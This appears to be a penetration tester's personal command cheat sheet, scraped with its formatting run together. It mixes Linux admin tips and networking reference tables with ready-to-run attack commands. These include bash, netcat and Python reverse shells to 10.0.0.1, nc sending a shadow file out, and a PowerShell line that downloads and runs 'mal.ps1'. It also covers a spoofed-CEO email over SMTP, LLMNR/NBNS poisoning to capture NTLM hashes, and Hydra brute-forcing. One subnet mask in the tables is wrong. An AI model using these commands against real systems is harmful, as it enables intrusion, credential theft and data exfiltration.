Field Manual
Table of Contents
Field Manual Table of Contents0x00 — Quick Reference 🚀0x01 — Reverse Shells 🐚Linux 🐧Python 🐍0x16 - Quality of Life 🤕Bash-ishI/O 💻Change iface names 🥅Realtek Driver Install 🔨WiFi Monitor Mode 🔎Kismet Setup 💋Kali Pinned on Ubuntu 🐲Kali Missing Key Fix 🐲Netfig 🥅Link Files to null ⚡️pv utility 🔨Password Dump Search 🔍Nix Fix ⛑.bash_aliases 👻log terminal sessionsShortcut directoriesFirefox Profiles0x10 - Linux 🐧0x11 — BinaryID 📇objdump 🚚0x12 — Everythin netcat 🐱0x13 — D/encoding Data 🔑CyberChef 🕵Base64 🤙0x14 - RECON 👀DNS Enumeration 📛Mirror sites 🔀0x15 — CTF 👮Executions 🔫File Downloads ⏬Secure Deletion 🔐0x20 — Windows 🤖0x21 — CMD 👴0x22 — Powershell 💪0x30 - Placeholder0x31 TBD0x40 — Alternatives ♻️0x41 — XMLHttpRequest.js 🕸0x50 - Networking 🤓0x51 - Reference TablesTTL Fingerprints 🤞Classful IPv4 Ranges 🔩Private IPv4 Ranges 🔩IPv4 Subnets 🔩0x52 - DIY Servers 🖥0x56 - Mounting Shares 🐧0x57 - SMB Enum 🐧0x58 - NetBIOS/LLMNR 🛂0x59 - Port Forwarding 🚡Windows 👴Linux 🐧0xFF - Appendix 💦Links 🔗Alt. References 🔗Hash Reference 🥔John the Ripper 🔪Hydra 🐉Cheat Sheets 👀
0x00 — Quick Reference 🚀
Tips & tricks of the more ultra rare, spicy, variety.
0x01 — Reverse Shells 🐚
On opposite day are reverse shells, bind shells? 💙
Linux 🐧
# Only works with the bash shellrhost="10.0.0.1"; rport="8080"; /bin/bash -i &> /dev/tcp/${rhost}/${rport} 0>&1# bash -s | option enables bash to read from 'stdin'xxxxxxxxxx# Requires the nc binaryrm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.0.0.1 8080 >/tmp/fPython 🐍
xxxxxxxxxx# Python2.7 command (-c) to connect to 10.0.0.1:8080 using the socket librarypython -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",8080));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'0x16 - Quality of Life 🤕
Bash-ish
x# Declare an indexed arraydeclare -a my_arraymy_array[0]='zero'my_array[1]='one'# ORmy_array=(zero one)# Print each index in my_arrayfor i in "${my_array[@]}"; do echo "$i"; done
# Declare an associative array (dictionary) declare -A my_arraymy_array=([z]=zero [o]=one)# Print each key in my_arrayfor key in "${!my_array[@]}"; do echo "$key"; done
# Returns the size of the arrayecho "${#my_array[@]}"
# Append to the arraymy_array+=three
# Remove an index from the arrayunset my_array[2]
# Remove key/pair from assoc. arrayunset my_array[o]
I/O 💻
| I/O OP | USAGE |
|---|---|
1> results.txt | stdout writes to the file |
2> stderr.txt | stderr writes to the file |
&> out.txt | stdout & stderr write to the file |
nc 10.0.0.1 1337 < shadow.txt | Send file input to 10.0.0.1:1337 |
| COMMAND | EXAMPLE | INFO |
|---|---|---|
fmt | cat words.txt | fmt | Formats stdin into paragraphs. |
pr | cat words.txt | fmt | pr | Formats stdin into pages. |
lpr | cat words.txt | fmt | pr | lpr | Sends stdin to a printer. |
tr | cat /dev/urandom | tr -dc '[:alnum:]' | Output random password from /dev/urandom |
Change iface names 🥅
xxxxxxxxxx# Change Ubuntu 18.04 Network interfaces back to wlan/ethsudo vim /etc/default/grub# Edit the variable 'GRUB_CMDLINE_LINUX' to the following:GRUB_CMDLINE_LINUX="net.ifnames=0 biosdevname=0"# Write / Quit then run the followingsudo update-grub && sudo reboot# Check sudo ip aRealtek Driver Install 🔨
xxxxxxxxxx# Download aircrack-ng linux drivergit clone -b v5.3.4 https://github.com/aircrack-ng/rtl8812au.gitcd rtl*sudo make -j4sudo make install# 'make' installs the '88XXau.ko' driver to '/lib/modules/5.0.0-25-generic/kernel/drivers/net/wireless/' on Ubuntu 18.04
# Now edit /etc/NetworkManger/NetworkManager.conf and add the following. Replace the mac with the mac of the card[keyfile]unmanaged-devices=mac:00:c0:ca:95:b8:58# Write / Quitsudo service NetworkManager restartWiFi Monitor Mode 🔎
xxxxxxxxxx# Set interface downsudo ip link set wlan1 down# Set monitor modesudo iw dev wlan1 set type monitor# Set interface upsudo ip link set wlan1 up
# airodump-ngsudo airodump-ng -w testdump --wps --beacon --band ag -M -U wlan1Kismet Setup 💋
xxxxxxxxxx# Install for Ubuntu 18.04wget -O - https://www.kismetwireless.net/repos/kismet-release.gpg.key | sudo apt-key add -echo 'deb https://www.kismetwireless.net/repos/apt/release/bionic bionic main' | sudo tee /etc/apt/sources.list.d/kismet.listsudo apt updatesudo apt install -y kismet
kismet wlan1# Then go to the web interface http://localhost:2501Kali Pinned on Ubuntu 🐲
xxxxxxxxxx# Add the following to /etc/apt/preferences.d/preferencesPackage: *Pin: release o=UbuntuPin-Priority: 1000
Package: *Pin: release a=kali-rollingPin-Priority: 100# Write / Quit
echo -n 'deb http://http.kali.org/kali kali-rolling main non-free contrib' > /etc/apt/sources.list.d/kali.list
sudo apt updateKali Missing Key Fix 🐲
xxxxxxxxxxwget -q -O - https://archive.kali.org/archive-key.asc | apt-key add -Netfig 🥅
xxxxxxxxxx# Spoof MAC Addressifconfig eth0 hw ether 00:1c:bf:87:25:d5
# Change Default Gatewayroute add default gw $IP_ADDRESS $INTERFACE_NAMELink Files to null ⚡️
xxxxxxxxxx# Symbolic link of /dev/null to new file of ${HOME}/nohup.outln -s /dev/null ${HOME}/nohup.outpv utility 🔨
xxxxxxxxxx# Display progress of file being readpv -p -e '/usr/share/wordlists/WORDLISTS.tar.gz' | zgrep -ia 'myemail@gmail.com' | tee /tmp/results.lstPassword Dump Search 🔍
xxxxxxxxxxgzip -cd *.tar.gz | grep -aniTEf ~/data/emails.egrep > matches.txt# gzip --stdout --decompressNix Fix ⛑
xxxxxxxxxx# EXPIRED KEY - APT UPDATEwget -O - http://apt.metasploit.com/metasploit-framework.gpg.key | sudo apt-key add -.bash_aliases 👻
| ALIASES | INFO |
|---|---|
alias ..='cd ..' | cd command shortcut |
alias ...='cd ../../../' | cd command shortcut |
alias ....='cd ../../../../' | cd command shortcut |
alias .2='cd ../../' | cd command shortcut |
alias .3='cd ../../../' | cd command shortcut |
alias .4='cd ../../../../' | cd command shortcut |
alias .5='cd ../../../../../' | cd command shortcut |
alias _='sudo' | sudo command shortcut |
alias alert='notify-send --urgency=low -i "$([ $? = 0 ] && echo terminal | alert a notification popup |
alias bc='bc -l' | bc command fix |
alias c='clear' | clear command shortcut |
alias chgrp='sudo chgrp --preserve-root' | sudo command shortcut |
alias chmod='sudo chmod --preserve-root' | sudo command shortcut |
alias chown='sudo chown --preserve-root' | sudo command shortcut |
alias chownd='sudo chown -R --preserve-root $USER:$USER' | sudo command shortcut |
alias dd='dd status=progress' | Status is always progress |
alias dr='docker run -it' | Run container interactively |
alias drm='docker run -it --rm' | Run container then remove |
alias drme='docker run -it --rm -e HOME=$HOME -v $HOME:$HOME -w $PWD -u $(id -u):$(id -g)' | Run container with env variables |
alias egrep='egrep --color=auto' | *grep command shortcut |
alias exot='exit' | exit typo fix |
alias ff='sudo find . -type f -iname $1 2>/dev/null' | find a file from the current dir |
alias fgrep='fgrep --color=auto' | *grep command shortcut |
alias grep='grep --color=auto' | *grep command shortcut |
alias halt='sudo /sbin/halt' | sudo command shortcut |
alias ipt='sudo iptables' | iptables command shortcut |
alias iptlist='sudo /sbin/iptables -L -n -v --line-numbers' | iptables command shortcut |
alias iptlistfw='sudo /sbin/iptables -L FORWARD -n -v --line-numbers' | iptables command shortcut |
alias iptlistin='sudo /sbin/iptables -L INPUT -n -v --line-numbers' | iptables command shortcut |
alias iptlistout='sudo /sbin/iptables -L OUTPUT -n -v --line-numbers' | iptables command shortcut |
alias l='ls -CF' | ls command shortcut |
alias la='ls -AF --color=auto' | ls command shortcut |
alias lc='cat -n' | cat with line numbers |
alias less='less -S' | Do NOT wrap lines in less |
alias lh='ls --color=auto -lisAdhF .[^.]*' | ls command shortcut |
alias ll='ls -lhF --color=auto' | ls command shortcut |
alias lla='ls -lAhF --color=auto' | ls command shortcut |
alias ls='ls --color=auto' | ls command shortcut |
alias mkdir='mkdir -pv' | mkdir folders verbosely |
alias netstat='sudo netstat -plan' | netstat all listening ports |
alias path='echo -e ${PATH//:/\\n}' | echo current $PATH variable |
alias ping='ping -c 3' | Do NOT ping continuously |
alias poweroff='sudo /sbin/poweroff' | sudo command shortcut |
alias reboot='sudo /sbin/reboot' | sudo command shortcut |
alias reload='reset; . ~/.bashrc; . ~/.bash_aliases' | Reload bash with proper env |
alias rm='rm -I --preserve-root' | rm interactively |
alias rms='shred -uz' | rm securely |
alias shutdown='sudo /sbin/shutdown' | sudo command shortcut |
alias txz='tar --xz -xf' | Un-tar xz files |
alias tzx='tar -zxf' | Un-tar gzip files |
alias wget='wget -c' | Continue wget downloads |
log terminal sessions
xxxxxxxxxxscript -t 2> timing.log -a output.sessionscriptreplay timing.log output.sessionShortcut directories
xxxxxxxxxx# Bookmark directories using 'pushd'pushd /var/www/html/pushd /etc/apt/pushd ~/Projects/airodump/aug/
# Then use 'popd' to pull from the stack!popdFirefox Profiles
firefox --noremote --ProfileManager
##
0x10 - Linux 🐧
General Debian/Ubuntu based distro copy-&-paste-able commands
0x11 — BinaryID 📇
objdump 🚚
xxxxxxxxxxobjdump -f "$file" | grep '^architecture' | cut -d, -f1 | sed 's/architecture: //'
file mysterio.bin0x12 — Everythin netcat 🐱
xxxxxxxxxx# Target 1/bin/bash -i &> /dev/tcp/${rhost}/${rport} 0>&1
# Reverse Shellmknod backpipe p; nc ${rhost} ${rport} 0<backpipe | /bin/bash 1>backpipe
# One-shot Web Server{ printf 'HTTP/1.0 200 OK\r\nContent-Length: %d\r\n\r\n' "$(wc -c < some.file)"; cat some.file; } | nc -l ${lport}
# UDP Port scannc -vzu ${rhost} ${rports}
# Port scanningnc -v -n -z -w 1 ${rhost} ${rports}
# NCat # HTTPS GET Requestprintf 'GET /rootme HTTP/1.1\r\nHost: rootme.com\r\n\r\n' | ncat --ssl rootme.com 443
# NCat SMTP Clientncat -C mail.rootme.com 25# HELO client.rootme.com# MAIL FROM:attacker@rootme.com# RCPT TO:victim@rootme.com# DATA# From: ceo@rootme.com# To: victim@rootme.com# Subject: You're fired.# # Sorry not sorry.# .# QUIT
# Netcat HTTP Requestnc 10.0.0.1 80GET / HTTP/1.1Host: 10.0.0.1User-Agent: Mozilla/5.0Referrer: google.com# <hit enter>
# Simple Web Server # Linuxncat -lk -p 8080 --sh-exec "echo -e 'HTTP/1.1 200 OK\r\n'; cat index.html"# orncat --lua-exec httpd.lua --listen 8080 --keep-open# Windowsncat -lk -p 8080 --sh-exec "echo HTTP/1.1 200 OK& echo(&type index.html"
# Port forwardncat -l localhost 8080 --sh-exec "ncat example.org 80"
# SSH Tunnel NCatssh -o ProxyCommand="ssh -q ${gateway} ncat %h %p" ${rhost}
# Dynamic SSH Tunnelssh ${gateway} -D 8080ncat --proxy localhost:8080 --proxy-type socks5 ${rhost}
# SSH Tunneled NCat file transferssh -NfL 1337:localhost:7331ncat -v -w 2 localhost 1337 < sentncat -lvnp 7331 localhost > received
# NCat honeyportncat -l --keep-open 1337 --hex-dump gotscanned.log > /dev/null # NCat SSL Tunnelopenssl req -new -x509 -keyout test-key.pem -out test-cert.pemncat --listen --ssl --ssl-cert test-cert.pem --ssl-key test-key.pemncat --ssl-verify --ssl-trustfile test-cert.pem0x13 — D/encoding Data 🔑
CyberChef 🕵
Base64 🤙
xxxxxxxxxx# Write base64 data without newlinesbase64 -w 0 foo.zip | base64 -d > foo2.zip
# base64: Removes any invalid inputcat file.b64 | base64 -di > binary0x14 - RECON 👀
DNS Enumeration 📛
xxxxxxxxxx# NameServers Query for target.orgdig +short ns target.org
# A RECORD DNS Query# Goal: Get the IP's associated to the toplevel domain.dig a target.org @nameserver
# MX RECORD DNS Query# Goal: Find mail servers to enumeratedig mx target.org @nameserver
# DNS Zone Transfer Query# Goal: Aquire all DNS entries for hosts within the 'target.org' zonedig afxr target.org @nameserver
# Bruteforce Subdomainsdnsrecon -d zonetransfer.me -D /usr/share/wordlists/dnsmap.txt -t std --xml ouput.xmlMirror sites 🔀
xxxxxxxxxxwget --mirror -k ${depth} ${url}# -OR- httrack0x15 — CTF 👮
Work arounds for restricted shells.
Executions 🔫
xxxxxxxxxx# ez pz cd "$(dirname ${path_to_bin}/rootme)"
# TTY Spawnpython -c 'import pty;pty.spawn("/bin/bash")'echo os.system('/bin/bash')
# Vivi:!bash
# gcc compileecho 'int main() { return chmod("/bin/chmod", 0755); }' | gcc -x c - && ./a.out
# x86 load file/lib/i386-linux-gnu/ld-linux.so.2 ${path_to_bin}/rootme
# x64 load file/lib/x86_64-linux-gnu/ld-linux-x86-64.so.2 ${path_to_bin}/rootme
install -m a+x /bin/chmod /tmp/chmod2File Downloads ⏬
xxxxxxxxxxcurl -s https://raw.githubusercontent.com/andrew-d/static-binaries/master/binaries/linux/x86_64/socat -o /tmp/socat/socat
# browser => developer tools => network => copy & paste response to filecat file.b64 | base64 -di > binarySecure Deletion 🔐
xxxxxxxxxx_DEVICE="/dev/sdc"_PASS=$(tr -cd '[:alnum:]' < /dev/urandom | head -c 128)openssl enc -aes-256-ctr -pass pass:"${_PASS}" -nosalt </dev/zero | dd bs=64K ibs=64K of=$_DEVICE status=progress conv=notrunc0x20 — Windows 🤖
0x21 — CMD 👴
xxxxxxxxxxtype C:\Users\Administrator\Desktop\flag.txt
# Mount SMB Sharenet use Z: \\win-server\share password /user:domain\janedoe /savecred /p:no0x22 — Powershell 💪
xxxxxxxxxxiex ((New-Object Net.WebClient).DownloadString("https://abc.ru/mal.ps1"))
&"{Get-Content .\mal.ps1 | iex}"
Get-FileHash -Algorithm SHA512 .\test.txt
gci | foreach-object { write-output "Object: $_" } gci | % { write-output "Object: $_" }
get-process | where-object { $_.name -eq "notepad" }get-process | ? { $_.name -eq "notepad"}
1..254 | % { test-connection 192.168.0.$_ }0x30 - Placeholder
0x31 TBD
0x40 — Alternatives ♻️
0x41 — XMLHttpRequest.js 🕸
xxxxxxxxxx// WUTitDO: Download a binary from Github
var github_user = "andrew-d";var git_branch = "master";
// Raw base64 encoded byte streamvar b64raw = "https://raw.githubusercontent.com/"+ github_user +"/static-binaries/"+ git_branch +"/binaries/linux/x86_64/socat";
var xreq = new XMLHttpRequest();xreq.open('GET', b64raw, true);xreq.send();document.write(xreq.responseText)// Your webpage should now be base64 text to save
// If method 1 doesn't work try this!var apijson = "https://api.github.com/repos/"+ github_user +"/static-binaries/contents/binaries/linux/x86_64/socat?ref=master";
var xreq = new XMLHttpRequest();xreq.open('GET', apijson, true);xreq.send();document.write(JSON.parse(xreq.responseText).content)// Your webpage should now be base64 text to save0x50 - Networking 🤓
0x51 - Reference Tables
TTL Fingerprints 🤞
| OPERATING SYSTEM | TTL SIZE |
|---|---|
| Windows | 128 |
| Linux | 64 |
| Solaris | 255 |
| Cisco / Network | 255 |
Classful IPv4 Ranges 🔩
| CLASS | IP ADDRESS RANGE |
|---|---|
| A | 0.0.0.0 - 127.255.255.255 |
| B | 128.0.0.0 - 191.255.255.255 |
| C | 192.0.0.0 - 223.255.255.255 |
| D | 224.0.0.0 - 239.255.255.255 |
| E | 240.0.0.0 - 255.255.255.255 |
Private IPv4 Ranges 🔩
| CLASS | RANGE |
|---|---|
| A | 10.0.0.0 - 10.255.255.255 |
| B | 172.16.0.0 - 172.31.255.255 |
| C | 192.168.0.0 - 192.168.255.255 |
| D | 127.0.0.0 - 127.255.255.255 |
IPv4 Subnets 🔩
| CIDR | DECIMAL MASK | NUMBER OF HOSTS |
|---|---|---|
| /31 | 255.255.255.254 | 1 Host |
| /30 | 255.255.255.252 | 2 Hosts |
| /29 | 255.255.255.249 | 6 Hosts |
| /28 | 255.255.255.240 | 14 Hosts |
| /27 | 255.255.255.224 | 30 Hosts |
| /26 | 255.255.255.192 | 62 Hosts |
| /25 | 255.255.255.128 | 126 Hosts |
| /24 | 255.255.255.0 | 254 Hosts |
| /23 | 255.255.254.0 | 512 Host |
| /22 | 255.255.252.0 | 1022 Hosts |
| /21 | 255.255.248.0 | 2046 Hosts |
| /20 | 255.255.240.0 | 4094 Hosts |
| /19 | 255.255.224.0 | 8190 Hosts |
| /18 | 255.255.192.0 | 16382 Hosts |
| /17 | 255.255.128.0 | 32766 Hosts |
| /16 | 255.255.0.0 | 65534 Hosts |
| /15 | 255.254.0.0 | 131070 Hosts |
| /14 | 255.252.0.0 | 262142 Hosts |
| /13 | 255.248.0.0 | 524286 Hosts |
| /12 | 255.240.0.0 | 1048674 Hosts |
| /11 | 255.224.0.0 | 2097150 Hosts |
| /10 | 255.192.0.0 | 4194302 Hosts |
| /9 | 255.128.0.0 | 8388606 Hosts |
| /8 | 255.0.0.0 | 16777214 Hosts |
0x52 - DIY Servers 🖥
xxxxxxxxxxpython -m SimpleHTTPServer 8080python3 -m http.server 8080php -S 0.0.0.0:80800x56 - Mounting Shares 🐧
xxxxxxxxxx# NFS Shares are linux predominantmount 10.0.0.1:/vol/share /mnt/nfs# CIFS is a dialect of SMB and are windows predominantmount -t cifs -o username=user,password=pass,domain=blah //192.168.1.X/share-name /mnt/cifs0x57 - SMB Enum 🐧
xxxxxxxxxx# Enumerate userspython /usr/share/doc/python-impacket-doc/examples/samrdump.py 10.0.0.1nmap -sU -sS --script=smb-enum-users -p U:137,T:139 10.0.0.0/24
# Default linux utilitiesnmblookup -A 10.0.0.1smbclient //MOUNT/share -I 10.0.0.1 -Nrpcclient -U "" 10.0.0.1
# SMB Versionsmbclient -L //10.0.0.1
# Open SMB Shares on a subnetnmap -T4 -v -oA shares --script smb-enum-shares --script-args smbuser=${username},smbpass=${password} -p445 10.0.0.0/24
# See links for downloadenum4linux 10.0.0.10x58 - NetBIOS/LLMNR 🛂
xxxxxxxxxxmsfconsole
# Spoof/Poisonuse auxiliary/spoof/llmnr/llmnr_responseuse auxiliary/spoof/nbns/nbns_response
# Capture Credentialsauxiliary/server/capture/smbauxiliary/server/capture/http_ntlm
# -OR- See links to downloadpython Responder.py -i ${localhost-ip} -I eth0
# Produces NTLMv2 Hash to crack0x59 - Port Forwarding 🚡
Windows 👴
xxxxxxxxxx# See appendix for plink download linkplink.exe -P 22 -l root -pw "1337" -R 445:127.0.0.1:445 REMOTE-IPLinux 🐧
-AAllows Agent Forwarding-NDo NOT execute a command-fBackground the proccess
xxxxxxxxxx# Local Port Forwardssh -NAfL ${lport}:${final-host}:${rport} ${user}@${gateway-host}# Examplessh -NAfL 8080:192.168.0.3:80 root@192.168.0.2
xxxxxxxxxx# Remote Port Forwardssh -NAfR ${rport}:localhost:${port-to-publicize} user@${proxy-host}ssh -NAfR 2222:localhost:22 user@192.168.0.2
xxxxxxxxxx# Dynamic SOCKS Proxyssh -NAfD ${remote-proxy-port} ${remote-proxy-host}# Examplessh -NAfD 8080 root@10.0.0.80
0xFF - Appendix 💦
Links 🔗
| Link | Usage |
|---|---|
| SimplyEmail | Email enumeration tool hosted on Github. |
| udp-proto-scanner | UDP protocols scanner hosted on Github. |
| Responder.py | NetBIOS/LLMNR Poisoning and Spoofing tool to capture NTLMv2 Hashes, hosted on Github. |
| plink.exe | Link to download the x64 plink binary from the PuTTY project, for Remote Port Forwarding. |
Alt. References 🔗
Hash Reference 🥔
| HASH | SIZE |
|---|---|
| MD5 Hash Length | 16 Bytes |
| SHA-1 | 20 Bytes |
| SHA-256 | 32 Bytes |
| SHA-512 | 64 Bytes |
| HASH | EXAMPLE |
|---|---|
| MD5 Hash | 8743b52063cd84097a65d1633f5c74f5 |
| MD5 $PASS:$SALT | 01dfae6e5d4d90d9892622325959afbe:7050461 |
| MD5 $SALT:$PASS | f0fda58630310a6dd91a7d8f0a4ceda2:4225637426 |
| SHA1 Hash | b89eaac7e61417341b710b727768294d0e6a277b |
| SHA1 $PASS:$SALT | 2fc5a684737ce1bf7b3b239df432416e0dd07357:2014 |
| SHA1 $SALT:$PASS | cac35ec206d868b7d7cb0b55f31d9425b075082b:5363620024 |
| SHA-256 | 127e6fbfe24a750e72930c220a8e138275656b8e5d8f48a98c3c92df2caba935 |
| SHA-256 $PASS:$SALT | c73d08de890479518ed60cf670d17faa26a4a71f995c1dcc978165399401a6c4 |
| SHA-256 $SALT:$PASS | eb368a2dfd38b405f014118c7d9747fcc97f4f0ee75c05963cd9da6ee65ef498:560407001617 |
| SHA-512 | 82a9dda829eb7f8ffe9fbe49e45d47d2dad9664fbb7adf72492e3c81ebd3e29134d9bc12212bf83c6840f10e8246b9db54a4859b7ccd0123d86e5872c1e5082f |
| SHA-512 $PASS:$SALT | e5c3ede3e49fb86592fb03f471c35ba13e8d89b8ab65142c9a8fdafb635fa2223c24e5558fd9313e8995019dcbec1fb584146b7bb12685c7765fc8c0d51379fd |
| SHA-512 $SALT:$PASS | 976b451818634a1e2acba682da3fd6efa72adf8a7a08d7939550c244b237c72c7d42367544e826c0c83fe5c02f97c0373b6b1386cc794bf0d21d2df01bb9c08a |
| NTLM Hash | b4b9b02e6f09a9bd760f388b67351e2b |
John the Ripper 🔪
xxxxxxxxxx# John the Ripperjohn --wordlist=/usr/share/wordlists/rockyou.txt hashes# Formatted Hash with Wordlist Attackjohn --format=descrypt --wordlist /usr/share/wordlists/rockyou.txt hash.txt# Formatted Hash with Bruteforce Attackjohn --format=descrypt hash --show Hydra 🐉
xxxxxxxxxx# FTPhydra -l ${USERNAME} -P /usr/share/wordlistsnmap.lst -f 10.0.0.1 ftp -V# POP3hydra -l ${USERNAME} -P /usr/share/wordlistsnmap.lst -f 10.0.0.1 pop3 -V# SMTPhydra -P /usr/share/wordlistsnmap.lst -f 10.0.0.1 smtp -V
# Use (-t) to limit concurrent connections - ex: hydra -t 15